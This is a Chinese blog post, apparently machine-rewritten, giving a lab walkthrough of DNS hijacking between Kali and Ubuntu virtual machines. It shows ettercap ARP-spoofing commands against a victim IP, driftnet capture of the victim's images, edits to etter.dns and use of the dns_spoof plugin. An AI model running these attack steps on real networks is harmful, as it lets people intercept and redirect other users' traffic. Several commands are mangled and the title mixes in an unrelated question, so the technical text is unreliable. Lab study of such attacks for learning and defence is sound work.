首页 > 编程知识 正文

DNS劫持教程,手机dns被劫持有什么现象

时间:2023-05-03 23:01:36 阅读:52078 作者:2543

为了学习如何实现dns劫持,我配置了两个虚拟机,包括kali和ubuntu。 kali的内部网ip为192.168.109.134,ubuntu的内部网ip为192.168.109.158,使用namp扫描生存的主机,首先下载ettercap。 我是kali系统,所以内部附带了ettercap。 现在不需要使用。 # apt-cachesearchettercap #使用上述命令运行apt-get install-yettercap-graphical后,在ettercap -v中输入有无输出以确定安装是否成功1、首先,要启用ip_forward传输,必须修改/etc/sysctl.conf文件。 通过编辑/etc/sysctl.conf文件并在其中添加一行net.ipv4.ip_forward=1,它实际上已经位于Ubuntu Server 18.04.1 LTS中,因此位于开头arp欺骗: (如果您想执行arp欺骗,可以在此处执行,但不执行不会影响后续结果。)

ettercap-TQ-ieth0- marp :远程/192.168.109.158//192.168.109.2 /

sudo apt-get安装漂移网

sudo driftnet -i eth0

在受到攻击的ubuntu系统上访问和下载图像时,图像将显示在driftnet上。

arp内容参考来源: https://blog.csdn.net/QQ _ 41490561/article/details/104737332

2、我找到了修改ettercap的配置文件。 etter.dns。 在本例中,建议您在whereis中查找ettercap目录,然后cd使用ls -a命令查找etter.dns文件(对于找到的每个结果)。 这个是附属的。 然后,修改里面的结构。 例如,ubuntu访问www.baidu.com时,我们攻击的IP:ettercap-TQ-ieth0- marp 3360 remote-pdns _ spoof/192.168.110 t (文本)是只有文本的GUI,q (队列)不显示数据内容。 p使用插件,这里是名为dns_spoof的插件3,使用命令行进行dns劫持攻击。 ettercap-TQ-ieth0- marp : remote-pdns _ spoof/192.168.109.158//192.168.109.2 /之前为eth0或内部网适配器这个帖子只是教育,不要实际攻击。

版权声明:该文观点仅代表作者本人。处理文章:请发送邮件至 三1五14八八95#扣扣.com 举报,一经查实,本站将立刻删除。